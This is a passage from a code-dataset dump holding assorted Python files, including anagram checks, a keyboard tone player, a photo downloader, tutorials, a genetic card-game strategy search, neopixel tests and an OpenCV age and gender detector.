)","sub_path":"bin/dna_replay_local_path.py","file_name":"dna_replay_local_path.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"333005961","text":"original_str = \"jugall\"\ncompare_str = \"lauglj\"\n\n\ndef is_anagram_dict(original_string, compare_string):\n\n if not original_string or not compare_string:\n return False\n\n original_string = original_string.replace(\" \", \"\").lower()\n compare_string = compare_string.replace(\" \", \"\").lower()\n\n if len(original_string) != compare_string:\n return False\n\n char_count_dict = dict()\n\n for char in original_string:\n if char in char_count_dict:\n char_count_dict[char] = char_count_dict[char] + 1\n else:\n char_count_dict[char] = 1\n\n for char in compare_string:\n if char not in char_count_dict:\n return False\n\n elif char_count_dict[char] > 1:\n char_count_dict[char] = char_count_dict[char] - 1\n else:\n char_count_dict.pop(char)\n\n return True\n\n\nprint(is_anagram_dict(original_str, compare_str))\n\n\n\nfrom collections import Counter\ndef anagram_collection_counter(original_string, compare_string):\n # Counter() returns a dictionary data\n # structure which contains characters\n # of input as key and their frequencies\n # as it's corresponding value\n return Counter(original_string) == Counter(compare_string)\n\n\n# Driver function\nprint(anagram_collection_counter(original_str, compare_str))\n\n\ndef anagram_sorting(original_string, compare_string):\n original_string = original_string.replace(\" \", \"\").lower()\n compare_string = compare_string.replace(\" \", \"\").lower()\n\n if len(original_string) != compare_string:\n return False\n\n return sorted(original_string) == sorted(compare_string)\n\nprint(anagram_sorting(original_str, compare_str))\n\n\n\n","sub_path":"ds/array/anagram_check.py","file_name":"anagram_check.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"624818811","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pynput import keyboard\nimport threading\nimport time\nimport random\n\nkey_repeat_limit = 4\nplayAudioFile = None\nlastKey = None\n\ntry:\n import winsound\n def _temp(fname):\n winsound.PlaySound(fname, winsound.SND_FILENAME)\n playAudioFile = _temp\nexcept ImportError as ee:\n pass\n\nif playAudioFile is None:\n import pygame\n pygame.mixer.init(44100, -16, 1, 1024)\n def _temp(fname):\n pygame.mixer.music.load(fname)\n pygame.mixer.music.play()\n #-- while pygame.mixer.music.get_busy():\n #-- time.sleep(0.05)\n time.sleep(0.2)\n playAudioFile = _temp\n\nkey2wavs = { \"q\" : 2, \"w\" : 4, \"e\" : 5, \"r\" : 7, \"t\" : 9, \"y\" : 11, \"u\" : 0, \"i\" : 2, \"o\" : 4, \"p\" : 5,\n \"1\" : 1, \"2\" : 2, \"3\" : 3, \"4\" : 4, \"5\" : 5, \"6\" : 6, \"7\" : 7, \"8\" : 8, \"9\" : 9, \"0\" : 10,\n \"z\" : 14, \"x\" : 16, \"c\" : 17, \"v\" : 19, \"b\" : 21, \"n\" : 5, \"m\" : 7, \",\" : 9, \".\" : 11, \"/\" : 2,\n \"a\" : 2, \"s\" : 9, \"d\" : 5, \"f\" : 7, \"g\" : 11, \"h\" : -1, \"j\" : 2, \"k\" : -2, \"l\" : 1, \";\" : 5,\n \"{\" : 3, \"}\" : -3, \"(\" : 2, \")\" : -2, \"[\" : 1, \"]\" : -1 ,\n \"space\" : -6, \"tab\" : 0, \"delete\" : -4, \"backspace\" : -4, \"enter\" : -2,\n }\n\ninterval = []\nrptc = 0\n\ndef getFname(tx):\n return \"wavs/sound{}.wav\".format(tx)\n\ndef playTone(tx):\n fname = getFname(tx)\n playAudioFile(fname)\n\ndef playInterval(intv):\n baseidx = 18\n t1 = baseidx\n t2 = baseidx + intv\n #playTone(t1)\n playTone(t2)\n\ndef playThread():\n while True:\n if len(interval) > 0:\n playInterval(interval.pop(0))\n else:\n time.sleep(0.05)\n\ndef processKey(key):\n global lastKey\n global rptc\n #-- if random.random() > 0.2:\n #-- return True\n if len(interval) > 4:\n return True\n ret = True\n temp = None\n temp = str(key)\n kk = None\n if temp.startswith(u\"Key\"):\n kk = temp[4:]\n elif len(temp) == 3:\n kk = temp[1]\n if kk != None:\n tt = key2wavs.get(kk)\n if tt is not None:\n if kk == lastKey:\n rptc += 1\n else:\n rptc = 0\n if rptc < key_repeat_limit:\n interval.append(tt)\n if lastKey == \"f11\" and kk == \"f12\":\n ret = False\n lastKey = kk\n return ret\n\nth = threading.Thread(target=playThread)\nth.daemon = True\nth.start()\n\nwith keyboard.Listener(on_press=processKey) as listener:\n listener.join()\n\n\n","sub_path":"keytone/keytone.py","file_name":"keytone.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"615753006","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport multiprocessing\nimport requests\n\nUSER_AGENT = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\n\ndef download_review_photos(session, review_filepath, output_dir):\n with open(review_filepath, \"r\") as f:\n review = json.load(f)\n\n for i, review_photo_url in enumerate(review):\n with open(os.path.join(output_dir, f\"{i}.jpg\"), \"wb\") as f:\n with session.get(review_photo_url, stream=True) as r:\n for chunk in r.iter_content(chunk_size=65536):\n f.write(chunk)\n\n\ndef download_review(review_filename):\n if not review_filename.endswith(\".json\"):\n return\n session = requests.session()\n session.headers[\"User-Agent\"] = USER_AGENT\n review_id = os.path.splitext(review_filename)[0]\n output_dir = os.path.join(\"review_photos\", review_id)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n download_review_photos(\n session, os.path.join(\"review_photos\", review_filename), output_dir\n )\n\n\ndef main():\n with multiprocessing.Pool(6) as pool:\n pool.map(download_review, os.listdir(\"review_photos\"))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"image_scraper.py","file_name":"image_scraper.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552683184","text":"import mcpi.minecraft as minecraft\n\nmc = minecraft.Minecraft.create()\n\nmc.postToChat(\"Hello Minecraft World\")\n\nimport time\n\nwhile(1):\n pos = mc.player.getTilePos()\n\n print(pos.x)\n print(pos.y)\n print(pos.z)\n\n from led import *\n\n if pos.y > 5:\n green_led(1)\n else:\n green_led(0)\n\n time.sleep(5)\n","sub_path":"a_minecraft/python_modding/python_code/MCpos.py","file_name":"MCpos.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463675482","text":"# Vectors and interpolation/08-timescaling.py\nfrom Panda import *\n\n# This path is a square\npath = at(P3(-1.5,0,-1.5)) + forever(move(1, P3(3, 0, 0)) + move(1, P3(0,0,3)) + move(1, P3(-3, 0, 0)) + move(1, P3(0,0,-3)))\n# How long does this path take to traverse?\n# This is a function definition - it launches a panda using t as the time base,\n# p0 as the initial position, and painted the given color.\ndef go(t, color):\n panda(position = interpolate(t, path), color = color)\n \ngo(time, red)\n# Create a second panda that follow the same path at the opposite side of the square, ahead of the original\n# Create another panda that goes twice as fast\n# Create a panda that is exactly 1 second behind the first one\n# Can you make one that speeds up more and more?\n\ngo(time-2, blue)\ngo(time*2, green)\ngo(time-1, yellow)\ngo(time*time, white)\nstart()\n","sub_path":"CompletedPandaHandouts/src/Vectors and Interpolation/08-timescaling.py","file_name":"08-timescaling.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376738517","text":"# -*- coding: utf-8 -*-\r\n# -*- author: JeremySun -*-\r\n# -*- dating: 20/1/25 -*-\r\n\r\n\r\n\"\"\"\r\n储备知识exec\r\n参数1:字符串形式的命令\r\n参数2:全局作用域(字典形式),如果不指定,默认使用globals()\r\n参数3:局部作用域(字典形式),如果不指定,默认使用locals()\r\n\"\"\"\r\n\r\ng = {\r\n 'x': 1,\r\n 'y': 2\r\n}\r\n\r\nl = {}\r\n\r\nexec(\"\"\"\r\nglobal x, m\r\nx = 10\r\nm = 100\r\n\r\nz = 3\r\n\"\"\", g, l)\r\nprint(g)\r\nprint(l)\r\n\r\n\"\"\"\r\n一切皆对象,对象可以怎么用?\r\n 1、都可以被引用,x=obj;\r\n 2、都可以当做函数的参数传入;\r\n 3、都可以当做函数的返回值;\r\n 4、都可以当做容器类(列表、元组等)的元素。\r\n\r\n类也是对象,Foo = type(...)\r\n\"\"\"\r\n\r\n\r\nclass Foo(object):\r\n pass\r\n\r\n\r\nclass Bar(object):\r\n pass\r\n\r\n\r\nobj = Foo()\r\nprint(type(obj)) # \r\nprint(type(Foo)) # \r\nprint(type(Bar)) # \r\n# 可见其元类都是type\r\n\r\n\"\"\"\r\n元类:产生类的类就是元类。\r\n 默认用class定义的类,它们的元类都是type\r\n\"\"\"\r\n\r\n\r\n# 定义类的两种方式:\r\n# 方式1:class。实际上是class这个类调用了type这个元类产生类,即Chinese=type(...)\r\n\r\nclass Chinese(object):\r\n country = 'China' # 每一个中国人都有国籍\r\n\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n def talk(self):\r\n print('{name} is talking'.format(name=self.name))\r\n\r\n\r\n# 方式2:type\r\n# 定义类的三要素:类的名字;类的基类;类的名称空间\r\nclass_name = 'Chinese'\r\nclass_bases = (object,)\r\nclass_body = \"\"\"\r\ncountry = 'China' # 每一个中国人都有国籍\r\n\r\ndef __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\ndef talk(self):\r\n print('{name} is talking'.format(name=self.name))\r\n\"\"\"\r\nclass_dic = {} # 初始状态\r\nexec(class_body, globals(), class_dic)\r\nprint(class_dic)\r\n# 造类\r\nChina = type(class_name, class_bases, class_dic)\r\nprint(Chinese)\r\nprint(China)\r\n","sub_path":"Class Learn/26 元类介绍.py","file_name":"26 元类介绍.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420421899","text":"#!/usr/bin/env python3\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\nimport sys\n\ndef merge_utlog_files(input_files):\n merged_data = {}\n\n # 全てのファイルを統合する\n for file in input_files:\n with open(file, 'r') as f:\n reader = csv.reader(f)\n header = next(reader) # ヘッダ行をスキップ\n\n for row in reader:\n timestamp = float(row[0])\n timestamp = round_to_nearest_minute(timestamp) # タイムスタンプを最も近い1分に丸める\n\n if timestamp not in merged_data:\n merged_data[timestamp] = {}\n\n for i, data in enumerate(row[1:]):\n column_name = f\"CH{i+1}\"\n\n if column_name not in merged_data[timestamp]:\n merged_data[timestamp][column_name] = []\n\n merged_data[timestamp][column_name].append(float(data))\n\n # 1分ごとに平均値を計算する\n merged_utlog_data = []\n column_names = sorted(set([column for data in merged_data.values() for column in data.keys()]))\n\n for timestamp in sorted(merged_data.keys()):\n row = [timestamp]\n\n for column_name in column_names:\n if column_name in merged_data[timestamp]:\n data = merged_data[timestamp][column_name]\n average = sum(data) / len(data)\n row.append(average)\n else:\n row.append(\"\")\n\n merged_utlog_data.append(row)\n\n # 出力ファイル名を作成\n current_datetime = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n output_file = f\"utlog_merged_{current_datetime}.csv\"\n\n # 結果の出力\n with open(output_file, 'w', newline='') as f:\n writer = csv.writer(f)\n header = [\"Timestamp\"] + column_names\n writer.writerow(header) # ヘッダ行を書き込む\n\n for row in merged_utlog_data:\n writer.writerow(row)\n\n print(f\"結果が {output_file} に出力されました。\")\n\ndef round_to_nearest_minute(timestamp):\n dt = datetime.fromtimestamp(timestamp)\n rounded_dt = dt - timedelta(seconds=dt.second, microseconds=dt.microsecond) + timedelta(minutes=1)\n return rounded_dt.timestamp()\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"使用方法: python utlog_merge.py 入力ファイル1 入力ファイル2 ...\")\n sys.exit(1)\n\n input_files = sys.argv[1:]\n merge_utlog_files(input_files)\n","sub_path":"opt/pyplot/utlog_merge.py","file_name":"utlog_merge.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52939366","text":"import sys\nfrom collections import defaultdict\n\n\ndef main():\n array = [i for i in name.keys() if name[i] == 2]\n array.sort()\n print(len(array))\n print(\"\\n\".join(array))\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, m = map(int, input().split())\n name = defaultdict(int)\n for _ in range(n + m):\n name[input().rstrip()] += 1\n\n main()\n","sub_path":"0707/1764 듣보잡.py","file_name":"1764 듣보잡.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610084794","text":"import discord\nfrom redbot.core import commands\nfrom TagScriptEngine import Interpreter, adapter, block\n\n\nclass Tag(object):\n def __init__(\n self,\n name: str,\n tagscript: str,\n *,\n invoker: discord.Member = None,\n author: discord.Member = None,\n author_id: int = None,\n uses: int = 0,\n ctx: commands.Context = None\n ):\n self.name = name\n self.tagscript = tagscript\n self.invoker = invoker\n self.author = author\n self.author_id = author_id\n self.uses = uses\n self.ctx = ctx\n\n def __str__(self) -> str:\n return self.name\n\n def __len__(self) -> int:\n return len(self.tagscript)\n\n def run(self, interpreter: Interpreter, **kwargs) -> Interpreter.Response:\n return interpreter.process(self.tagscript, **kwargs)\n\n @classmethod\n def from_dict(cls, name: str, data: dict, *, ctx: commands.Context):\n self = cls.__new__(cls)\n self.name = name\n self.tagscript = data[\"tag\"]\n self.uses = data.get(\"uses\")\n self.invoker = data.get(\"invoker\")\n self.author_id = data.get(\"author_id\", data.get(\"author\"))\n if ctx:\n self.ctx = ctx\n self.author = ctx.guild.get_member(data.get(\"author\"))\n else:\n self.ctx = None\n self.author = None\n return self\n","sub_path":"tags/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417775943","text":"from collections import deque\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \"\"\"\n Approach 1: DFS - iterative in order\n TC: O(h + k) --> O(n) worst case\n SC: O(h)\n \"\"\"\n\n def kthSmallest(self, root: TreeNode, k: int) -> int:\n stack = deque()\n curr = root\n while stack or curr:\n while curr:\n stack.append(curr)\n curr = curr.left\n curr = stack.pop()\n\n # logic\n k -= 1\n if k == 0: return curr.val\n curr = curr.right\n return\n\n \"\"\"\n Approach 2: DFS recursive\n TC: O(n)\n SC: O(h)\n \"\"\"\n\n def __init__(self):\n self.count = 0\n self.result = None\n\n def kthSmallest(self, root: TreeNode, k: int) -> int:\n self.inorder(root, k)\n return self.result\n\n def inorder(self, root, k):\n # base\n if not root:\n return\n\n # logic\n self.inorder(root.left, k)\n self.count += 1\n if k == self.count:\n self.result = root.val\n return\n self.inorder(root.right, k)\n\n \"\"\"\n Followup - if the same operation needs to be done frequently:\n 1) in the constructor, traverse through all nodes and identify number of nodes on left and right of each node\n 2) based on this count you can do a binary search find of an approach\n\n \"\"\"","sub_path":"Problem-1.py","file_name":"Problem-1.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191626789","text":"import os\nimport cv2\nimport pickle\n\n\ndef get_data(p, folder_list):\n if p['LoadFromCache']:\n images = pickle.load(open(p['CachePath'], \"rb\"))\n labels = pickle.load(open(p['CacheLablesPath'], \"rb\"))\n else:\n folder_path = p['BaseDataPath']\n images, labels = open_folders(p, folder_path, folder_list)\n pickle.dump(images, open(p['CachePath'], \"wb\"))\n pickle.dump(labels, open(p['CacheLablesPath'], \"wb\"))\n return images, labels\n\n\ndef open_folders(p, folder_path, folder_list):\n folders = os.listdir(folder_path)\n labels = []\n images = []\n for fo in folder_list:\n folder_path_of_image = os.path.join(folder_path, folders[fo])\n image, label = open_files(p, folder_path_of_image, folders[fo])\n images.append(image)\n labels.append(label)\n return images, labels\n\n\ndef open_files(p, folder_path_of_images, label):\n images = []\n labels = []\n files = os.listdir(folder_path_of_images)\n number_of_files = len(files)\n if number_of_files > p['NumberOfImages']:\n number_of_files = p['NumberOfImages']\n for fi in range(number_of_files):\n labels.append(label)\n image_path = os.path.join(folder_path_of_images, files[fi])\n dest_path = os.path.join(folder_path_of_images, \"Scaled_\" + files[fi])\n image = resize_image(p, image_path, dest_path)\n images.append(image)\n return images, labels\n\n\ndef resize_image(p, image_path, DestPath):\n src_image = cv2.imread(image_path)\n gray_image = cv2.cvtColor(src_image, cv2.COLOR_RGB2GRAY)\n scaled_image = cv2.resize(gray_image, (p['ResizePixelSize'], p['ResizePixelSize']), interpolation=cv2.INTER_LANCZOS4)\n return scaled_image\n # images.append(scaledImage)\n","sub_path":"GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138762178","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Copyright 2010 OpenStack, LLC\n# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nInstallation script for python-keystoneclient's development virtualenv\n\"\"\"\n\nimport os\nimport sys\n\nimport install_venv_common as install_venv\n\n\nclass Debian(install_venv.Distro):\n \"\"\"This covers all Debian-based distributions.\"\"\"\n\n def check_pkg(self, pkg):\n return run_command_with_code(['dpkg', '-l', pkg],\n check_exit_code=False)[1] == 0\n\n def apt_install(self, pkg, **kwargs):\n run_command(['sudo', 'apt-get', 'install', '-y', pkg], **kwargs)\n\n def apply_patch(self, originalfile, patchfile):\n run_command(['patch', originalfile, patchfile])\n\n def install_virtualenv(self):\n if self.check_cmd('virtualenv'):\n return\n\n if not self.check_pkg('python-virtualenv'):\n self.apt_install('python-virtualenv', check_exit_code=False)\n\n super(Debian, self).install_virtualenv()\n\n\nclass Suse(install_venv.Distro):\n \"\"\"This covers all SuSE distributions.\"\"\"\n\n def check_pkg(self, pkg):\n return run_command_with_code(['rpm', '-q', pkg],\n check_exit_code=False)[1] == 0\n\n def zypper_install(self, pkg, **kwargs):\n run_command(['sudo', 'zypper', '-qn', 'install', pkg], **kwargs)\n\n def apply_patch(self, originalfile, patchfile):\n run_command(['patch', originalfile, patchfile])\n\n def install_virtualenv(self):\n if self.check_cmd('virtualenv'):\n return\n\n if not self.check_pkg('python-virtualenv'):\n self.zypper_install('python-virtualenv', check_exit_code=False)\n\n super(Suse, self).install_virtualenv()\n\n\ndef print_help():\n help = \"\"\"\n python-keystoneclient development environment setup is complete.\n\n python-keystoneclient development uses virtualenv to track and manage\n Python dependencies while in development and testing.\n\n To activate the python-keystoneclient virtualenv for the extent of your\n current shell session you can run:\n\n $ source .venv/bin/activate\n\n Or, if you prefer, you can run commands in the virtualenv on a case by case\n basis by running:\n\n $ tools/with_venv.sh \n\n Also, make test will automatically use the virtualenv.\n \"\"\"\n print(help)\n\n\ndef main(argv):\n root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n venv = os.path.join(root, '.venv')\n pip_requires = os.path.join(root, 'requirements.txt')\n test_requires = os.path.join(root, 'test-requirements.txt')\n py_version = \"python%s.%s\" % (sys.version_info[0], sys.version_info[1])\n project = 'python-keystoneclient'\n install = install_venv.InstallVenv(root, venv, pip_requires, test_requires,\n py_version, project)\n if os.path.exists('/etc/SuSE-release'):\n install_venv.Distro = Suse\n elif os.path.exists('/etc/debian_version'):\n install_venv.Distro = Debian\n options = install.parse_args(argv)\n install.check_python_version()\n install.check_dependencies()\n install.create_virtualenv(no_site_packages=options.no_site_packages)\n install.install_dependencies()\n install.run_command([os.path.join(venv, 'bin/python'),\n 'setup.py', 'develop'])\n install.post_process()\n print_help()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"tools/install_venv.py","file_name":"install_venv.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633536616","text":"from __future__ import print_function\nfrom generation import *\n\nimport sys\n\nimport resource\n\ndef memory_usage_ps():\n import subprocess\n import os\n out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],\n stdout=subprocess.PIPE).communicate()[0].split(b'\\n')\n vsz_index = out[0].split().index(b'RSS')\n mem = float(out[1].split()[vsz_index]) / 1024\n return mem\n\nmyGen = Generation(200)\nmyGen.randomizeMembers(200)\nmyDeck = Deck(4)\n\nfor gen in range(200):\n myGen.playGames(10000, myDeck)\n myGen.sort()\n\n BestWins = [strat.getWins() for strat in myGen[:5]]\n \n print(\"Done Generation \"+str(gen))\n print(\"The best win rates were: \" + str(BestWins))\n print(\"Generation \"+str(gen)+ \" best strategy:\\n\"+str(myGen[0]), file=sys.stderr)\n\n tempGen = Generation(200)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 30)\n tempGen.cloneMembers(myGen, 10, 20)\n tempGen.cloneMembers(myGen, 30, 20)\n tempGen.faultyCloneMembers(myGen, 0, 30)\n tempGen.faultyCloneMembers(myGen, 0, 30)\n tempGen.randomizeMembers(20)\n tempGen.randomizeMembers(20)\n\n del myGen\n myGen = tempGen\n del tempGen\n print (memory_usage_ps())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"8620745","text":"# python imports\nimport concurrent.futures\n\n# project imports\nfrom .stock import Stock\nfrom .beverage import Beverage\n\n\nclass CoffeeMachine:\n \n def __init__(self, outlets: int, total_ingredients: dict):\n self.outlets = outlets\n self.stock = Stock.get_instance()\n self.stock.add_stock(total_ingredients)\n \n def serve(self, beverages: dict):\n \"\"\"Serve beverages in parallel to customers.\n\n Args:\n beverages (dict): beverages with their required ingredients and quantity\n \"\"\"\n servings = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.outlets) as executor:\n for item, ingredients in beverages.items():\n beverage = Beverage(item, ingredients)\n servings.append(executor.submit(beverage.brew))\n for serving in concurrent.futures.as_completed(servings):\n print(serving.result())\n","sub_path":"coffee_machine/coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"166688089","text":"from pybricks.pupdevices import ColorDistanceSensor\nfrom pybricks.parameters import Port, Color\nfrom pybricks.tools import wait\n\n# Initialize the sensor.\nsensor = ColorDistanceSensor(Port.A)\n\n\n# This is a function that waits for a desired color.\ndef wait_for_color(desired_color):\n # While the color is not the desired color, we keep waiting.\n while sensor.color() != desired_color:\n wait(20)\n\n\n# Now we use the function we just created above.\nwhile True:\n\n # Here you can make your train/vehicle go forward.\n\n print(\"Waiting for red ...\")\n wait_for_color(Color.RED)\n\n # Here you can make your train/vehicle go backward.\n\n print(\"Waiting for blue ...\")\n wait_for_color(Color.BLUE)\n","sub_path":"snippets/pup/sensor_color_distance/wait_for_color.py","file_name":"wait_for_color.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"486864917","text":"# test_stickneopixel.py - test LED-stick\n# 2017_0122 PePo new\n# Source:\n# Tony Dicola source: https://gist.github.com/tdicola/6fe1fbc173dcd49de3a95be5fd9594f6\n\nimport machine\nimport math\nimport neopixel\nimport time\n\n# 2017_0122 LED stick: GPIO15 / D8, 1 * 8 pixels\nPIXEL_WIDTH = 8\nPIXEL_HEIGHT = 1\nMAX_BRIGHT = 50 # 0 .. 255\n\nnp = neopixel.NeoPixel(machine.Pin(15), PIXEL_WIDTH*PIXEL_HEIGHT)\n\n# Clear all the pixels and turn them off.\nnp.fill((0,0,0))\nnp.write()\n\nwhile True:\n # RED\n np.fill((MAX_BRIGHT, 0, 0))\n np.write()\n time.sleep(1.0)\n\n # GREEN\n np.fill((0, MAX_BRIGHT, 0))\n np.write()\n time.sleep(1.0)\n\n # BLUE\n np.fill((0, 0, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # PINK\n np.fill((MAX_BRIGHT, 0, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # WHITE\n np.fill((MAX_BRIGHT, MAX_BRIGHT, MAX_BRIGHT))\n np.write()\n time.sleep(1.0)\n\n # blank pixels\n np.fill((0, 0, 0))\n np.write()\n time.sleep(1.0)\n","sub_path":"display-stuff/neopixels/neopixelplasma/test_stickneopixel.py","file_name":"test_stickneopixel.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"471155861","text":"# Chương trình nhận dạng Giới tính là Male hay Female; \r\n# Nhận dạng tuổi với 8 phân nhóm: (0 – 2), (4 – 6), (8 – 12), (15 – 20), (25 – 32), (38 – 43), (48 – 53), (60 – 100)\r\n# Sử dụng CNN (Mạng nơ-ron tích chập - convolutional neural network) huấn luyện nhận dạng và phân loại hình ảnh\r\n#Chương trình sử dụng một tập dữ liệu (dataset) gồm 26,580 bức ảnh; Mỗi bức ảnh đã được gán nhãn là male/female và 1 trong 8 nhóm tuối.\r\n\r\n#File opencv_face_detector.pbtxt và File opencv_face_detector_uint8.pb: File định dạng text và nhị phân, là 2 file của TensorFlow\r\n#2 file này sử dụng để chạy mô hình huấn luyện phát hiện khuôn mặt người trong ảnh, trong file có lưu định nghĩa đồ thi và các trọng số sau huấn luyện\r\n#age_deploy.prototxt và gender_deploy.prototxt: là kiến ​​trúc mô hình cho mô hình phát hiện Tuổi và Giới tính \r\n#Là các tệp văn bản thuần túy có cấu trúc giống JSON chứa tất cả các định nghĩa của lớp mạng thần kinh\r\n\r\n#age_net.caffemodel và gender_net.caffemodel: Lưu trọng số mô hình được huấn luyện để phát hiện Tuổi và Giới tính \r\n\r\nimport cv2\r\nimport math\r\nimport argparse\r\n\r\n\r\n#Hàm phát hiện tọa độ khuôn mặt người trong bức hình\r\ndef highlightFace(net, frame, conf_threshold=0.7):\r\n frameOpencvDnn=frame.copy()\r\n frameHeight=frameOpencvDnn.shape[0]\r\n frameWidth=frameOpencvDnn.shape[1]\r\n \r\n #Xây d��ng đốm màu và chuyển qua cho mạng CNN để nhận diện khuôn mặt\r\n blob=cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\r\n net.setInput(blob)\r\n detections=net.forward()\r\n faceBoxes=[]\r\n \r\n #Vòng lặp để trích xuất tọa độ khuôn mặt\r\n for i in range(detections.shape[2]):\r\n confidence=detections[0,0,i,2]\r\n if confidence>conf_threshold:\r\n x1=int(detections[0,0,i,3]*frameWidth)\r\n y1=int(detections[0,0,i,4]*frameHeight)\r\n x2=int(detections[0,0,i,5]*frameWidth)\r\n y2=int(detections[0,0,i,6]*frameHeight)\r\n faceBoxes.append([x1,y1,x2,y2])\r\n cv2.rectangle(frameOpencvDnn, (x1,y1), (x2,y2), (0,255,0), int(round(frameHeight/150)), 8)\r\n return frameOpencvDnn,faceBoxes\r\n\r\n\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--image')\r\n\r\nargs=parser.parse_args()\r\n\r\n# Xác định các biến trọng số và kiến ​​trúc cho các mô hình phát hiện khuôn mặt, tuổi tác và giới tính\r\nfaceProto=\"opencv_face_detector.pbtxt\"\r\nfaceModel=\"opencv_face_detector_uint8.pb\"\r\nageProto=\"age_deploy.prototxt\"\r\nageModel=\"age_net.caffemodel\"\r\ngenderProto=\"gender_deploy.prototxt\"\r\ngenderModel=\"gender_net.caffemodel\"\r\n\r\n#Khởi tạo các giá trị trung bình của mô hình và các phân lớp Tuổi và Giới tính \r\nMODEL_MEAN_VALUES=(78.4263377603, 87.7689143744, 114.895847746)\r\nageList=['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\r\ngenderList=['Male','Female']\r\n\r\n#Sử dụng các mô hình phát hiện khuôn mặt, tuổi và giới tính đã khai báo ở trên\r\nfaceNet=cv2.dnn.readNet(faceModel,faceProto)\r\nageNet=cv2.dnn.readNet(ageModel,ageProto)\r\ngenderNet=cv2.dnn.readNet(genderModel,genderProto)\r\n\r\n# Kích hoạt camera nếu không có hình ảnh nhận dạng\r\nvideo=cv2.VideoCapture(args.image if args.image else 0)\r\npadding=20\r\n\r\n\r\nwhile cv2.waitKey(1)<0:\r\n hasFrame,frame=video.read()\r\n if not hasFrame:\r\n cv2.waitKey()\r\n break\r\n\r\n resultImg,faceBoxes=highlightFace(faceNet,frame)\r\n if not faceBoxes:\r\n print(\"No face detected\")\r\n\r\n for faceBox in faceBoxes:\r\n face=frame[max(0,faceBox[1]-padding):\r\n min(faceBox[3]+padding,frame.shape[0]-1),max(0,faceBox[0]-padding)\r\n :min(faceBox[2]+padding, 